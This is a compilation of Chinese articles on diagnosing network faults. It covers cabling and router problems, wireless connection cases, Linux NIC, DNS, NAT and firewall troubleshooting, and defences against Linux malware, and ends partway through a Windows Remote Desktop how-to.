网络常见故障分类和排查

《一键清理系统垃圾》

网络常见故障分类和排查

在现行的网络管理体制中，由于网络故障的多样性和复杂性，网络故障分类方法也不尽相同。根据网络故障的性质可以分为物理故障与逻辑故障,也可以根据网络故障的对象分为线路故障、路由器故障和主机故障。

    一、按网络故障的性质划分

    1．物理故障

    物理故障，是指设备或线路损坏、插头松动、线路受到严重电磁干扰等情况。比如说，网络中某条线路突然中断，如已安装网络监控软件就能够从监控界面上发现该线路流量突然掉下来或系统弹出报警界面，更直接的反映就是处于该线路端口上的无线电管理信息系统无法使用。

    解决方法：首先用DOS命令集中的ping命令检查线路与网络管理中心服务器端口是否连通，如果不连通，则检查端口插头是否松动，如果松动则插紧，再用ping命令检查，如果已连通则故障解决。也有可能是线路远离网络管理中心的那端插头松动，则需要检查终端设备的连接状况。如果插口没有问题，则可利用网线测试设备进行通路测试，发现问题应重新更换一条网线。

    另一种常见的物理故障就是网络插头误接。这种情况经常是没有搞清网络插头规范或没有弄清网络拓扑结构的情况下导致的。

    解决方法：熟悉掌握网络插头规范，如T568A和T568B，搞清网线中每根线的颜色和意义，做出符合规范的插头。 还有一种情况，比如两个路由器直接连接，这时应该让一台路由器的出口连接另一路由器的入口，而这台路由器的入口连接另一路由器的出口才行，这时制作的网线就应该满足这一特性，否则也会导致网络误解。不过像这种网络连接故障显得很隐蔽，要诊断这种故障没有什么特别好的工具，只有依靠网络管理的经验进行解决。

    2. 逻辑故障

    逻辑故障中的一种常见情况就是配置错误，就是指因为网络设备的配置原因而导致的网络异常或故障。配置错误可能是路由器端口参数设定有误，或路由器路由配置错误以致于路由循环或找不到远端地址，或者是网络掩码设置错误等。比如，同样是网络中某条线路故障，发现该线路没有流量，但又可以Ping通线路两端的端口，这时很可能就是路由配置错误导致循环了。

    解决方法：诊断该故障可以用traceroute工具，可以发现在traceroute的结果中某一段之后，两个IP地址循环出现。这时，一般就是线路远端把端口路由又指向了线路的近端，导致IP包在该线路上来回反复传递。这时需要更改远端路由器端口配置，把路由设置为正确配置，就能恢复线路了。当然处理该故障的所有动作都要记录在日志中，防止再次出现。

    逻辑故障中另一类故障就是一些重要进程或端口关闭，以及系统的负载过高。比如，路由器的SNMP进程意外关闭或死掉，这时网络管理系统将不能从路由器中采集到任何数据，因此网络管理系统失去了对该路由器的控制。还有，也是线路中断，没有流量，这时用ping发现线路近端的端口ping不通。

    解决方法：检查发现该端口处于down的状态，就是说该端口已经给关闭了，因此导致故障。这时只需重新启动该端口，就可以恢复线路的连通了。 此外，还有一种常见情况是路由器的负载过高，表现为路由器CPU温度太高、CPU利用率太高，以及内存余量太小等，虽然这种故障不能直接影响网络的连通，但却影响到网络提供服务的质量，而且也容易导致硬件设备的损害。

    二、按网络故障的对象划分

    1．线路故障

    线路故障最常见的情况就是线路不通，诊断这种故障可用ping检查线路远端的路由器端口是否还能响应，或检测该线路上的流量是否还存在。一旦发现远端路由器端口不通，或该线路没有流量，则该线路可能出现了故障。这时有几种处理方法。首先是ping线路两端路由器端口，检查两端的端口是否关闭了。如果其中一端端口没有响应则可能是路由器端口故障。如果是近端端口关闭，则可检查端口插头是否松动，路由器端口是否处于down的状态；如果是远端端口关闭，则要通知线路对方进行检查。进行这些故障处理之后，线路往往就通畅了。

    如果线路仍然不通，一种可能就得线路本身的问题，看是否线路中间被切断；另一种可能就是路由器配置出错，比如路由循环了。就是远端端口路由又指向了线路的近端，这样线路远端连接的网络用户就不通了，这种故障可以用traceroute来诊断。解决路由循环的方法就是重新配置路由器端口的静态路由或动态路由。

    2．路由器故障

    事实上，线路故障中很多情况都涉及到路由器，因此也可以把一些线路故障归结为路由器故障。但线路涉及到两端的路由器，因此在考虑线路故障是要涉及到多个路由器。有些路由器故障仅仅涉及到它本身，这些故障比较典型的就是路由器CPU温度过高、CPU利用率过高和路由器内存余量太小。其中最危险的是路由器CPU温度过高，因为这可能导致路由器烧毁。而路由器CPU利用率过高和路由器内存余量太小都将直接影响到网络服务的质量，比如路由器上丢包率就会随内存余量的下降而上升。检测这种类型的故障，需要利用MIB变量浏览器这种工具，从路由器MIB变量中读出有关的数据，通常情况下网络管理系统有专门的管理进程不断地检测路由器的关键数据，并及时给出报警。而解决这种故障，只有对路由器进行升级、扩内存等，或者重新规划网络的拓扑结构。

    另一种路由器故障就是自身的配置错误。比如配置的协议类型不对，配置的端口不对等。这种故障比较少见，在使用初期配置好路由器基本上就不会出现了。

    3．主机故障

    主机故障常见的现象就是主机的配置不当。比如，主机配置的IP地址与其他主机冲突，或IP地址根本就不在子网范围内，这将导致该主机不能连通。如泰州无线电管理处的网段范围是172.17.14.1—172.17.14.253，所以主机地址只有设置在此段区间内才有效。还有一些服务设置的故障。比如E-Mail服务器设置不当导致不能收发E-Mail，或者域名服务器设置不当将导致不能解析域名。主机故障的另一种可能是主机安全故障。比如，主机没有控制其上的finger，rpc，rlogin等多余服务。而恶意攻击者可以通过这些多余进程的正常服务或bug攻击该主机，甚至得到该主机的超级用户权限等。

    另外，还有一些主机的其他故障，比如不当共享本机硬盘等，将导致恶意攻击者非法利用该主机的资源。发现主机故障是一件困难的事情，特别是别人恶意的攻击。一般可以通过监视主机的流量、或扫描主机端口和服务来防止可能的漏洞。当发现主机受到攻击之后，应立即分析可能的漏洞，并加以预防，同时通知网络管理人员注意。现在，各市都安装了防火墙，如果防火墙地址权限设置不当，也会造成网络的连接故障，只要在设置使用防火墙时加以注意，这种故障就能解决。


网络故障详解

《一键清理系统垃圾》

网络故障详解

  问：我们总觉得我们网吧的网络不够流畅，你们有没有什么好的建议？

    答：这实际上是一个很复杂的问题，在这里我们没有办法详细的解答。我们要强调的是，网络是个有机的整体，主要由服务端设备、网络传输设备和客户端设备组成。同时，网络介质如网线、光纤线路等也是很重要的组成部分。而这其中任何一个部分都可能是导致网络速度不理想原因所在。我们在进行系统实施的过程中，会对客户系统的提出网络的改进建议供客户采纳。对于大规模的应用，我们会为客户提出完整的网络设计或改造方案。

     问：请问在做接入的时候是用路由器好，还是用代理服务器好？

     答：在这里我想首先纠正大家的一个误解。网吧的典型的接入方式是通过 ISP 提供的一个合法 IP 地址来带动大量的非法 IP 连入互连网，这种接入实际上不能用路由的方式。准确的说应该是用 NAT 或者说是 PAT 的方式来接入。很多网吧业主的另外一个误区就是把市面上几百、几千块的带简单路由功能的宽带猫等同为标准的路由器。真正的路由器并不是哪个企业都能生产的，而且价格绝对不会在 5000 元以下。而且就算是用企业级的路由器，如果使用 NAT 的方式来接入，也是很耗路由器的 CPU 和内存资源的。如果使用路由器做接入，根据实际的经验，一台 200 台的网吧需要使用华为的 Quidway2631e 系列路由器，而且必须将内存增加到最大，这一型号的路由器的价格在 15000 左右，并且实际使用的效果也不好。所以说，在网吧使用路由器是不现实的。而使用那些几千块钱的所谓的路由器那就更是笑话。我们会为我们的客户提供最好的接入服务解决方案。

     问：我的网络中的主交换机应该使用什么样的设备？

     答：网吧的网络拓扑结构基本上是以主交换机为核心，向工作站分散的结构。主交换机通过子交换机连接所有的工作站。那么实际上，主交换机是不能随便选用的。网吧的网络结构往往是平面的，广播量奇大。系统的有效带宽都被垃圾信息占用。要解决这些问题，有两种办法，第一是把网络拆成若干个小的物理网络，互不干扰。第二是就是运用管理型的望落设备将网络中的流量有效隔离和控制。网吧中往往有很多信息是需要共享的，譬如文件服务器、收银服务器等，所以不可能将网络完全从物理上拆分开来。那么我们就需要选用比较好的网络设备来完成逻辑上划分的工作。


无线网络连接故障一网打尽

《一键清理系统垃圾》

无线网络连接故障一网打尽

  无线网络设备的价格日趋平易近人，众多网虫纷纷告别网线的束缚，开始享受无线带来的无拘无束的快乐。但是，有些读者还是反映网络时常出现连接失败的情况。今天，我们就把一些无线连接故障的实例集中起来作个详细的分析并提供解决的方案。

    无线技术常识

    无线局域网(WLAN)的工作频段一般在2.4GHz，属微波通讯的范畴。传输特点是直线型、可见型，即目视范围的通信联系方式。这就说明雨、雾、墙等障碍均能影响到微波的传输质量。所以，我们在使用无线技术时也应该考虑到这些特点，在适当的环境下搭建网络。

    无线通讯的距离与辐射功率、天线的方向性以及天线增益有关。常见的无线设备辐射输出功率在200mW以下，无线网卡的功率一般仅几十mW。目前的无线设备一般自带全向天线，全向天线电波以天线为轴，呈“面包圈”状向外辐射；定向天线具有极强的方向性，在小角度的辐射范围外是完全没有信号的；使用可拆卸天线的设备可以外接增益天线，可以在不增加天线辐射功率的情况下增加通讯距离。

    微波在线缆中传输的要求很高，信号在线缆、接口上的损耗超出人们的想象，普通线材不适合做天线信号的传输介质。

    无线网络常见通讯故障

    在多数情况下，无线设备连接故障是由于使用不当引起的。通常表现有连接困难、通讯速度慢、掉线等故障。其故障原因一般分为三个：

    环境因素：AP与网卡间的距离过长；AP与网卡间有障碍物影响，比如室内复杂环境，墙壁、家具影响。

    人为因素：工作在2.4GHz频段的微波设备，如微波炉；网络线缆、天线线缆接触故障；定向天线特性等影响。

    设备因素：如设备过热；缓存过小等。

    障实例及分析解决

    例一 AP+PCI台式机无线网卡组合，300平方米办公室环境，AP位于独立单间机房内部，最远网卡通讯距离约30米，在AP的覆盖范围内。最远距离时网卡连接正常后（连接速率稳定在5.5Mbps~11Mbps间）固定AP位置。施工结束后发现有多个连接盲点。

    分析解决：盲点设备区域网卡安置在落地的台式机上，网卡与AP间有操作员、PC设备、办公桌柜用具以及机房墙壁阻隔导致通讯连接故障。考虑到室内无吊顶，AP无外接天线接口，所以不适合使用外接天线。在不增加成本，不破坏室内美观的条件下，可以把AP挂在机房墙壁外，并最大限度提高安装高度，调整好终端位置后就可解决有盲点的问题。

    例二 AP+AP桥接通讯组合，通讯距离约150米，两AP都在室内，无建筑阻隔，通讯速率最高2Mbps，经常发生连接失败的故障。

    分析解决：这样的距离基本接近AP桥接的最远距离，架设外接增益天线是最好的解决方案。考虑到成本因素，可以使用另一种方案：两AP安装至室外墙壁，利用两墙壁作为反射物增强前方辐射波。在AP与墙面间以铝塑板做盆状容器保护，既美观又解决了防水、防晒难题，还起到了很好的反射作用。处理后的连接速率最高达到11Mbps，掉线现象不会再出现。

    例三 AP+笔记本电脑无线网卡组合，直线通讯距离20米，终端处在地下室位置，AP位于与地下室建筑物呈直角的三楼，故障现象是连接时好时坏，连接速率在最高11Mbps至无信号之间波动。

    分析解决：通讯距离不长，但墙与地的隔离作用影响了通讯质量，环境移动物体（车辆）因素变化导致复杂折射/反射，信号强度变化巨大。我们可以采取以下方案稳定信号：增加网卡外置天线；调整AP天线角度使天线辐射角度垂直于地下室笔记本电脑网卡；在AP天线的后端增加反射铝塑板。这样处理后连接速率应该就能稳定起来。

    例四 AP+笔记本电脑无线网卡+PCI台式机无线网卡家用组合，这是一个典型的家用无线局域网应用。用户反映，即使网卡与AP同在一个房间之内，两机ADSL拨号（带路由功能）掉线现象也十分频繁。

    分析解决：试着使用USB或LAN连接路由器和PC机，如果发现拨号连接稳定，长时间工作不掉线，由此就可判断故障可能来自于无线设备。进行了改善AP电源质量、散热等多种尝试均未见明显效果，则判断掉线现象为AP缓存过小引起的。处理办法是更换AP或限制传输速率。考虑成本，使用限速方案。设置AP最高连接速率2Mbps后，故障明显减少，也基本满足两机同时上网需要。

    例五 某无线网络更换使用室外平板增益天线后，网络终端无信号。

    分析解决：正常情况下，使用外接增益天线后网络会增加连接距离，网络终端无信号，有可能是定向天线的方向性故障。调整方向、垂直角度后故障便会消失。 小知识：通常远距离连接的无线网络一般会选用增益很高、方向性很强的八木天线、栅格天线、抛面天线、背射天线。而某些平板天线经特殊设计后也具有很强方向性以及定向增益，这类天线的方向性在使用中容易被忽视。

    例六 外接天线使用一段时间后连接无信号。

    分析解决：天线使用一段时间后出现连接故障，常见原因是接口接触不良。检查接口是否做好防水处理，如果发生锈蚀的情况，可用玻璃胶做外部防水涂覆处理。另外，也有可能是被雷击的特殊情况，对于这种情况一般很难维修，应该即时更换设备。


Linux网络连接故障排除(下)

《一键清理系统垃圾》

Linux网络连接故障排除(下)

三、Linux网络故障的解决问题的思路

    Linux网络故障排除应当遵循先硬件后软件的方法。因为硬件如果出现物理损坏那么如何设定网络都不能解决故障。解决问题的方法可以从自身Linux计算机的网卡查起，然后到服务器、集线器、路由器等硬件。如果确定硬件没有问题了，再来考虑软件的设定。

    1、检查网卡工作状况

    Linux下的网卡不能工作可能是以下原因之一：
    1. 网卡没有被Linux检测到；
    2. 没有与之相应的内核模块；
    3. 该模块没有被加载；
    4. Linux系统不支持你的网卡。

    详细情况可以参考笔者的：Linux服务器网卡驱动安装及故障排除（链接：http://www.ccw.com.cn/server/yyjq/htm2005/20050817_15OF4.htm ）需要补充一点是：调整自适应工网卡的作模式，现在的网卡大多是自适应工作模式，在配置网卡参数时我们很少考虑它的工作模式，但是在路由器、交换机、代理服务器等通信量比较大的关键设备上，应该为它指定正确的工作模式，这样可以避免故障。在Linux环境下，我们可以使用系统自带的工具mii-tool命令来配置网卡工作模式。

    mii-tool [-VvRrwl] [-A media,... | -F media] [interface ...]

    media: 100baseTx-FD, 100baseTx-HD, 10baseT-FD, 10baseT-HD, 100baseTx, 　10baseT

    主要选项：
    -V 表示查看网卡现在的工作模。
    －F 表示强行修改。
    －r 恢复网卡的自适应工作模式。
    －w 显示监测链路状态。
    －A 使用高级修改模式。
    －l 表示将修改记录写入syslog日志文件。
    media可选的模式有100baseTx-FD、100baseTx-HD、10baseT-FD、10baseT-HD等。

    Interface代表所选择的网卡，如eth0、eth1等。
    （1）强制网卡工作在100M双工模式下，输入命令：
    mii-tool -F 100baseTx-FD eth0

    （2）恢复网卡的自适应工作模式，输入命令：

    mii-tool -r eth0

    2、确认局域网内网络连接情况

    网卡设定确认没有问题之后，接下来要确认局域网内网络连接情况。根据图－2网络拓扑结构，对集线器1组成的局域网的要求有下面几点：

    （1）客户机IP的设定

    假设子网为192.168.1.0/24，那么局域网内所有计算机的IP应该介于192.168.1.1～192.168.1.254，且所有的计算机子屏蔽网络均为255.255.255.0，IP在所有的计算机都不可以重复。

    （2）网关

    假设Linux IP为192.168.1.2，那么局域网内所有客户机的网关是192.168.1.2 。

    （3）Windows端的通信协议

    局域网内其它的Windows系统的通信协议仅需要TCP/IP及NetBUEI即可，如果安装过多的通信协议可能会造成联机过慢。

    （4）Windows 端工作组与计算机名称

    假如需要资源共享，那么就必须在Windows系统中建立文件共享，并且所有的计算机工作组必须相同，但计算机名称不能相同。

    3、DNS故障排除

    Linux域名服务器使用的是Bind9版本。域名服务器包含数据库的部分段的信息,并可提供被称之为解析器的客户来访问。DNS域名解析服务是网络的基础服务，承担着将域名翻译为计算机可以识别的IP地址，以及寻找IP地址对应的逆向翻译工作。一旦DNS服务出现故障，用户就无法通过采用域名的方式进行互联网访问，同时相应的邮件服务器也会由于无法进行正常的域名解析而出现故障。由于DNS服务对于网络非常重要，所以也成为网络故障排除的重要任务。如果在Linux网络中无法进行域名解析，很可能是没有在本地指定有效的域名服务器，通常这种情况比较常见。大多数DNS故障是因为配置文件的语法错误，或者是对计算机分配了错误的地址造成的。DNS就是Domain Name System， DNS服务器可以分为三种，高速存服务器（Cache-only server）、主服务器（Primary Name server）、辅助服务器（Second Name Server）。 Linux 下主要DNS配置文件：Linux上的域名服务由named守护进程控制，该进程从主文件：/etc/named.conf中获取信息。

    它包括一族将主机名称映射为IP地址的各种文件：下面是named配置文件族详细内容。表－2 named配置文件族（请看附件）

    当进行DNS故障诊断时，可参照下面的步骤：
    （1）对全部记录检查和确认主机名称的拼写，记住绝对地址是以“.”结尾的．
    （2）如果在区文件中做了任何修改，务必修改SOA记录中的序列号，这将保证服务器正确地重新上载文件。
    （3）确定输入到主区的名称和IP地址匹配反向指针文件中的反向指针信息．
    （4）检查防火墙相关程序。
    （5）使用命令检查。（ping、dig、nslookup、named-checkzone、named-checkconf）
    （6）使用dlint软件检查DNS故障。dlint是一个专门检查DNS配置文件开放源代码软件。最新版本：1.4.0，官方网址：http://www.domtools.com/dns/dlint.shtml
    （7）另外如果客户端无法进行域名解析，最可能原因是没有在本地指定有效的域名服务器，这种情况比较常见。解决办法：一般修改和域名服务相关的文件如/etc/hosts或 /etc/resolv.conf，在这些文件中添加有效的域名服务器的IP地址就可以解决。如果判断不是本地域名解析的问题，例如在本地可以解析公司域名，但外面的客户无法正常解析公司域名，则需要和域名注册服务提供商联系，一同解决问题。因为此种情况的发生，可能是公司系统中的IP地址和注册的域名不对应的原因造成的。

    4、对于Linux服务器攻击造成网络故障

    对于Linux服务器来说，最大的危险是黑客攻击。对Linux服务器攻击的定义是：攻击是一种旨在妨碍、损害、削弱、破坏Linux服务器安全的未授权行为。攻击的范围可以从服务拒绝直至完全危害和破坏Linux服务器。最严重的是远程用户获得根权限。Linux网络中超级用户拥有最高权限。一旦远程用户获得根权限你的网络随时可能被摧毁。所以部署IDS是防止这类网络故障的选择。当然你还要采取其他措施:一个配置适当的防火墙不仅是系统有效应对外部攻击的第一道防线，也是最重要的一道防线。在新系统第一次连接上Internet之前，防火墙就应该被安装并且配置好。防火墙配置成拒绝接收所有数据包，然后再打开允许接收的数据包，将有利于系统的安全。防火墙的具体设置方法请参见iptables使用方法。

    5、Linux病毒造成网络故障的排除

    Linux操作系统一直被认为是Windows系统的劲敌，因为它不仅安全、稳定、成本低，而且很少发现有病毒传播。但是，随着越来越多的服务器、工作站和个人电脑使用Linux软件，电脑病毒制造者也开始攻击这一系统。对于Linux系统无论是服务器，还是工作站的安全性和权限控制都是比较强大的，这主要得力于其优秀的技术设计，不仅使它的作业系统难以宕机，而且也使其难以被滥用。Unix经过20多年的发展和完善，已经变得非常坚固，而Linux基本上继承了它的优点。在Linux里，如果不是超级用户，那么恶意感染系统文件的程序将很难得逞。当然，这并不是说Linux就无懈可击，病毒从本质上来说是一种二进制的可执行的程序。冲击波(Blast)等恶性程序虽然不会损坏Linux服务器，但是却会传播给访问它的Windows系统平台的计算机。

    Linux平台下的病毒分类:

    1.可执行文件型病毒。
    2.蠕虫（worm）病毒。
    3.脚本病毒。
    4.后门程序：在广义的病毒定义概念中，后门也已经纳入了病毒的范畴。活跃在Windows系统中的后门这一入侵者的利器在Linux平台下同样极为活跃。从增加系统超级用户账号的简单后门，到利用系统服务加载，共享库文件注射，rootkit工具包，甚至可装载内核模块（LKM），Linux平台下的后门技术发展非常成熟，隐蔽性强，难以清除。是Linux系统管理员极为头疼的问题。

    综合以上介绍，可以看到总体来说计算机病毒对Linux系统存在较小的危险。但是由于各种原因在企业应用中往往是Linux和Windows操作系统共存形成异构网络。在服务器端大多使用Linux和Unix的，桌面端使用Windows 。所以为Linux的防范病毒策略分成两个部分：

    1．针对Linux本身（服务器和使用其作为桌面的计算机）防范策略。

    可执行文件型病毒、蠕虫（worm）病毒、脚本病毒的防范通过安装GPL查杀病毒软件基本可以防范。服务器端可以使用AntiVir（http://www.hbedv.com/）它是工作在命令行下的，运行时可以较少占用系统资源。桌面用户可以选择tkantivir（http://www.sebastian-geiges.de/tkantivir/）是用Tcl/Tk写的，可以运行在任何X-Windows环境下面，比如KDE或Gnome等。

    对于后门程序防范可以采用LIDS（http://www.lids.org/）和Chkrootkit（http://www.chkrootkit.org/），LIDS是Linux内核补丁和系统管理员工具(lidsadm)，它加强了Linus内核。可以保护dev/目录下的重要文件。而Chkrootkit可以检测系统的日志和文件，查看是否有恶意程序侵入系统，并且寻找关联到不同恶意程序的信号。最新版本的Chkrootkit0.45可以检测出sniffers、Trojans、worms、rootkit等59种。

    2.针对使用Linux服务器后端的Windows系统的病毒防范策略。

    许多企业使用代理服务器接入互联网，许多用户Windows系统进行都是在进行HTTP网页浏览和文件下载时感染病毒，所以可以在代理服务器上加挂一个病毒过滤器，对用户浏览的HTTP网页进行病毒检测，发现有用户浏览网页感染病毒的状况即由代理服务器进行阻断，丢弃带有病毒的请求，将不安全的进程阻止在代理服务器内，禁止带有病毒的数据向客户端计算机传播。squid是一款非常优秀的代理服务器软件，但是并没有专门的病毒过滤功能。可以考虑使用德国开放源码爱好者开发的一款基于Linux的病毒过滤代理服务器——HAVP（http://www.server-side.de/）。HAVP病毒过滤代理服务器软件既可以独立使用，也可以与Squid串联使用，增强Squid代理服务器的病毒过滤功能。

    提供邮件服务是Linux服务器中重要应用。可以使用ClamAV（http://www.clamwin.com/），ClamAV 全名是 Clam AntiVirus，它跟Liunx一样强调公开程序代码、免费授权等观念，ClamAV 目前可以侦测超过40,000 种病毒、蠕虫、木马程序，并且随时更新数据库，有一组分布在世界各地的病毒专家，24小时更新及维护病毒数据库，任何人发现可疑病毒也可以随时跟她们取得 联系，立刻更新病毒码，在极短的时间内，网络上采用ClamAV的邮件服务器就完成最新的防护动作。

    6、Linux系统本身漏洞及其软件的BUG造成网络故障

    操作系统是计算机系统灵魂，维护着系统的底层，对内存、进程等子系统进行管理和调度。如果操作系统本身出现了漏洞，其影响将会是致命的。操作系统的内核，对于网络安全是至关重要的。目前，内核的维护主要分两种模式：对于私有操作系统，如Windows/Solaris等，由于个人用户不能直接接触其源代码，其代码由公司内部开发人员维护，其安全性由同样的团队保证，内核的修正与其他应用程序一样，以patch/SP包的方式发布。对于Linux这样的开放式系统，是一种开放的结构。应该说，开放的模式是双刃剑。从机制上讲，全世界的开发人员都能获得源代码，从而找出其中的纰漏，似乎安全性应该更好;但是同时，如果网络管理人员不能及时更新内核，也会留下安全隐患。Linux服务器运行的软件主要包括：Samba，Ftp，Ssh，Mysql，Php，Apache等，这些软件，大都是开源软件，而且都在不停升级，稳定版和测试版交替出现。在www.apache.org 上，最新的ChangeLog中都写着：bug fix, security bug fix的字样。所以Linux网管员要经常的关注相关网站的bug fix和升级，及时升级或添加补丁。

    总结：

    掌握OSI模型、TCP/IP分层模型及相对应的相关协议和正确网络拓扑结构，对于Linux网络故障分析与排除是非常重要的,另外Linux网络往往比较复杂需要你对多种网络操作系统都比较熟悉，还需要采取多种措施。如果能够配合使用一些网络检测工具（例如网络测试仪、网络嗅探器等），对于网络故障分析与排除也是非常有用的。


Linux网络连接故障排除(上)

《一键清理系统垃圾》

Linux网络连接故障排除(上)

一、Linux网络结构特点

    由于Linux是在Internet上发展成熟的操作系统，因此，它具有与生俱来的网络功能，特别在Internet和Intranet的功能上有明显优势。但是由于Linux的桌面应用和Windows的差距，除了一些Linux专门实验室之外大多数企业应用Linux系统时:往往是Linux和Windows或Unix等操作系统共存形成异构网络。掌握Linux TCP/IP的网络模型（见图－1所示），掌握OSI网络模型、TCP/IP模型及相关服务对应的层次对于Linux网络故障分析与排除是非常重要的。据统计，Linux网络故障有35％在物理层、25％在数据链路层、10％在网络层、10％在传输层、10％在对话、7％在表示层、3％在应用层。由此可以看出，网络故障通常发生在网络七层模型的下三层，即物理层、链路层和网络层。对应于实际网络也就是使用的网络线缆、连接模块、网卡、交换机、路由器等设备故障。这些故障可能因为硬件的质量或性能、磨损老化、人为误操作、不正确的网络协议设置、管理问题、Linux软件的BUG、系统受到黑客攻击和Linux病毒等原因造成。OSI的层次结构为网管员分析和排查故障提供了非常好的组织方式。由于各层相对独立，按层排查能够有效地发现和隔离故障，因而一般使用逐层分析和排查的方法。

把OSI七层模型和Linux TCP/IP四层网络模型对应，然后将各种网络协议也规档，这样有利于网络故障的排除。TCP/IP模型各个层次的功能和协议见表－1。

    需要重点说明的是: TCP/IP与OSI最大的不同在于OSI是一个理论上的网络通信模型，而TCP/IP则是实际运行的网络协议。图2示出TCP/IP的主要协议分类情况。
丛图3中可以看出这是一个典型的中型Linux异构以太网络。包括各种服务器、防火墙。网络节点在300个左右，对于这个网络故障应当丛网络硬件传输问题开始，然后检查软件设定问题。

    二、Linux网络故障

    1.网络硬件传输问题

    网络硬件传输问题引起的故障主要指连通性故障。

    （1）网络线缆

    在图－3中可以发现，网络接口设备中使用最多的是网络线缆　。由于网络线缆　经常接在墙角和门缝处，有可能被压坏。所以，需要注意网线是否因被截断、网线过度扭曲变形、自制网络接头（如RJ-45跳线头）品质不良造成讯号不良；网络接头与设备（如集线器、路由器、交换机）接触不良等。网络线缆的检测通常使用网络线缆测试仪。它主要用于测试目前大家常用的遮敝式双绞线、非遮敝式双绞线及同轴缆线等。一般来讲网络线缆测试仪都有侦测缆线错误状态功能，网线是否开路，是否短路以及相反、交叉、分离等即可就可辨别，同时在一定的范围内还可量测缆线的长度，更主要的是用它来核对双绞线末端到末端连接是否符合 EIA/TIA 568商业建筑电信布线标准。

    （2）网卡、集线器、路由器、交换机、ADSL调制解调器等网络硬件设备

    1、网卡不稳定、品质不佳，或者与整体系统的兼容性不佳； 各网络设备的接触不良，造成讯号衰减； 网络设备使用方法不良，造成设备功能衰减等都会造成传输问题。网卡的检测可以通过网卡的Link灯代表网线的好坏或者与Hub的连接是否正确，网卡的100M灯代表是否是100M连接。
    2、高品质的路由器、交换机一般都有液晶显示菜单，实时显示运行状态，可以从中看出设备的故障情况。大部分网络设备的物理层的信息虽然标识一样，但在细节上很不相同，需要仔细研读产品说明书来了解。另外可以在交换机上观察各以太口上获得的MAC地址来判断故障。链路层的信息一般和物理层的信息交织在一起，除非出现误码率高和设备运行状态不稳定等，都不需要对链路层进行排障。
    3、ADSL调制解调器:POWER: 当ADSL路由器接上电源后，电源LED指示灯会亮起。如果LED指示灯熄灭的话，请检查您的电源接线是否正确。STATUS: 当ADSL Modem与局端设备握手时会闪烁，连线后会常亮。LINE 当广域网线路联通时，指示灯会亮起；在线路有数据传送时会闪烁。PC 局域网联机LED指示灯。当联机上以太网时，此灯会亮起；在未连接以太网时，此灯是熄灭的。以太网有数据传输时闪烁。 TEST 测试用，常灭。

    （3） 网络设备配置的规则

    各个网络设备的配置都是有规则的。太长的网络线会造成讯号的衰减，导致网络联机的时间太长甚至无法联机。 例如100兆以太网要遵守5-4-3-2-1网络标准：5-最多有5个网段且干线总长最大为2469m。4-最多连4个中继器。 3-其中3个干线段上连工作站，一个干线最多100个工作站，中继器相当于一个工作站，干网的每一端均需50欧姆的端界器，其中一个必须接地。2-有两个网段只用来扩长而不连任何工作站，1-由此组成一个局域网，工作站到收发器最大距离50m，收发器最小间距2.5m。

    （4）UPS电源

    UPS电源是一个容易被忽视的环节。由于核心路由器、大型交换机、基带式“猫”等网络设备对电压和接地都非常敏感，因此，对于这些网络，应当使用性能优良的在线式UPS作为供电电源，对于服务器10个以上,节点在300个以上的中型网络最好使用10000W功率以上的，从而可以将所有的网络设备都连接在同一电源，避免不同设备间的电压差别。此外，机房和机柜要有非常好的接地措施，并为所有设备建立一条地线保证接地电压相同，确保网络设备正常进行。

    2.软件问题

    （1）网卡的IP地址设定错误

    网卡是Linux网络中的最常用设备，通常Linux服务器要安装两块以上网卡。网卡IP地址的设定不当是导致网络故障的最常见原因。例如，同一个IP在同一个网段中出现造成IP冲突、子屏蔽网络设定错误等。

    （2）路由问题（Router）

    这方面的问题出在网关的设定错误，或者是路由设定不正确，导致资料封包没有办法顺利地送出去。路由器是

    （3）网络负荷问题（Loading）

    当黑客对网络实施拒绝服务攻击时，同时有大量的信息包涌服务器或交换机和路由器，就有可能造成网络的停顿甚至挂起。许多Linux网络故障是由于Linux服务器遭到系统攻击引起的。

    （4）NAT问题

    NAT 无法正确的工作原因有很多，不过，如果您确定您的局域网络联机已经正常，而且主机可以正确的连上 Internet，另外，客户端的 DNS 设定也是正确的，那么可能发生的问题大概就是没有将转发功能打开，使用命令：

    ＃echo 1 > /proc/sys/net/ipv4/ip_forward

    如果使用采用iptables作为NAT服务器接入网络，还要通过NAT将内网IP转换为外网IP，隐藏内部网络
    iptables -t nat -A POSTROUTING -o eth0 -p tcp --dport 110 -j SNAT --to-source 202.112.133.119

    iptables -t nat -A POSTROUTING -o eth0 -p udp --dport 110 -j SNAT --to-source 202.112.133.119

    其中：该入服务器的eth0接口连外网，IP地址为202.112.133.119。eth1接口连局域网，IP地址为192.168.0.1；局域网内部有一台Web服务器，IP地址为192.168.0.100。

    （5）其它

    防火墙是Linux网络安全的关键部件，能够探测和阻挡的攻击。以Redhat Linux为例安装时已经内至三种不同级别（标准、高、无防火墙）的防火墙。有时候选择最高级别防火墙会让一些通信端口被防火墙挡住了，造成无法执行某些网络资源。如果没有指定具体情况,系统应用默认的防火墙级别即高级别防火墙,是指系统指允许DHCP网络链接、技术消息服务（IRC）和实时音频处理。中级别防火墙禁止运行远程会话、远程NFS 、FTP、SSH、HTTP、Telnet和端口好低于1023的如何连接。

    对于如何选择你自己的安全级别，要从您的工作需求决定。如果你目前只是学习Linux基础知识和编程，可以将级别降低一下，一旦你准备将企业应用或关键应用放到Linux平台上时，则应提高安全级别。另外在代理服务器（Squid）、文件服务器（Samba）等故障中也要考虑防火墙设定问题。

    另外Linux内核存在的漏洞问题；应用程序中BUG；以及不同的操作系统的兼容性问题；设备驱动的缺少也是发生Linux网络故障的原因。


轻松解决网络软件故障

《一键清理系统垃圾》

轻松解决网络软件故障

在日常工作中，经常因下属网点电脑出现故障而到处奔波，疲于奔命。革命工作嘛，跑跑腿本来也是应该的。不过郁闷的是有时候并不是电脑真的出了什么问题，只是软件的设置上出现了一些问题或其他类似的一些简单软件故障，心急火燎赶到之后几分钟修改完事就能搞定，但花在路上的时间却要一二个小时，让人感觉特冤！后来经过探索，我发现只要双方电脑的操作系统是Windows2000或WindowsXP或Windows2003，就能通过系统自带的远程桌面系统程序来实现对远程电脑的控制。从此，在机房中就能轻松搞定局域网内的电脑小故障，从而少走了不少的冤枉路，也提高了工作效率。下面我介绍一下进行远程电脑控制的做法。

    假设您机房中的电脑的操作系统为Windows2003，地址为10.26.31.20，简称为A机；故障机的操作系统为WindowsXP，地址为10.26.31.18，简称为B机。在A机依次打开“开始”菜单/“附件”/“通讯”/“远程桌面连接”，在“计算机(C)”输入B机的地址“10.26.31.18”
点击“连接”按钮，就会出现“登录到Windows”对话框。
